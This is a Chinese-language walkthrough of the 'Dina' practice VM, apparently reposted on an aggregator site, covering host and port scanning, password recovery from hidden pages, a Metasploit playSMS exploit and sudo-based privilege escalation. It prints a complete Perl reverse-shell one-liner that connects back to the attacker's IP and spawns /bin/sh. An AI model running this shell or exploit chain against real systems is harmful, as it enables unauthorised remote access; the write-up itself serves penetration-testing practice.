当前位置: 首页 > news >正文

Dina靶机渗透

1.信息查询

1.1. Ip查询

arp-scan  -l

192.168.220.137

1.2. 端口收集

nmap -T4  -A  -p-  192.168.220.137

1.3. 目录扫描

dirsearch -u 192.168.220.137 -e* -i 200

通过访问 robots.txt 文件发现有些禁止访问得目录

User-agent: *Disallow: /ange1Disallow: /angel1Disallow: /nothingDisallow: /tmpDisallow: /uploads

访问各个页面,在访问 nothing 页面中有重大发现

通过查看源代码,发现了一些密码

freedompasswordhelloworld!dianaIloveroot

继续访问/secure 目录,发现一个backup的压缩文件。

下载backup.zip压缩包然后解压

但是发现需要密码

我们刚刚得到的密码一个一个试

密码是freedom,解压成功发现是一个mp3

记事本打开看看

uname: touhidpassword: ******url : /SecreTSMSgatwayLogin

通过访问提供的 url,得到一个登录页面

我们 touhid 作为用户名,用上面收集的密码进行尝试,最后发现密码为 diana,登录成功

2. 开始渗透

2.1. 进入msf

在kali中开启msf

msfconsole

查看CMS历史漏洞

search playSMS

经过尝试后,发现第二个可以利用,接下来尝试利用该漏洞来getshell

options

另开一个终端窗口查看自己的ip

192.168.220.146

set RHOSTS 192.168.220.137   # 靶机的ipset LHOST 192.168.220.146    # kali的ipset TARGETURI /SecreTSMSgatwayLogin/  # 需要登录playsms的路径set USERNAME touhid  # 登录的账号set PASSWORD diana   # 登录的密码exploit  # 爆破

2.1.  进入shell并提权

shellsudo  -l

sudo  perl -e 'use Socket;$i="192.168.220.146";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

另开一个窗口

http://www.xdnf.cn/news/1042957.html

相关文章:

  • 算法训练第十七天
  • CQF预备知识:Python相关库 -- 通用非均匀随机数抽样 scipy.stats
  • 关于allegro 导入网表报错:Unable to find pin name in问题的解决
  • Java大模型开发入门 (9/15):连接外部世界(中) - 向量嵌入与向量数据库
  • JS进阶 Day03
  • 【构建】Meson、Bazel、Buck现代构建系统
  • RPG28.使用GameplayCue和制作死亡效果
  • Java线程安全计数器实现方案
  • 【stm32f4】ADC实验(stm32hal库)
  • 什么是旋转开关?
  • 使用NVIDIA TensorRT for RTX运行高性能AI应用程序
  • C++线性DP-最优解问题、方案数问题
  • PCL 计算点云的投影密度
  • 【整数递增加法拆分】2022-4-11
  • LangGraph基础知识(Human-in-the-loop)(五)
  • 《甘肃棒垒球》奥运会项目有哪些·垒球1号位
  • vue | async-validator 表单验证库 第三方库安装与使用
  • 高效I/O处理:模型与多路复用的探讨
  • Spring学习笔记
  • (14)python+ selenium自动化测试 -回顾
  • 探索数据的力量:Elasticsearch中指定链表字段的统计查询记录
  • 生日悖论理论及在哈希函数碰撞中的应用
  • AI视野:写作应用AI排行榜Top10 | 2025年05月
  • 隐式时钟与外时钟对比2025.6.14
  • boost之signal的封装及使用例子
  • 数列求和计算
  • XCTF-misc-János-the-Ripper
  • C++斯特林数在C++中的数学理论与计算实现1
  • 飞牛NAS本地化部署Dify打造私有LLMOps平台
  • CARSIM-制动压力与制动踏板行程关系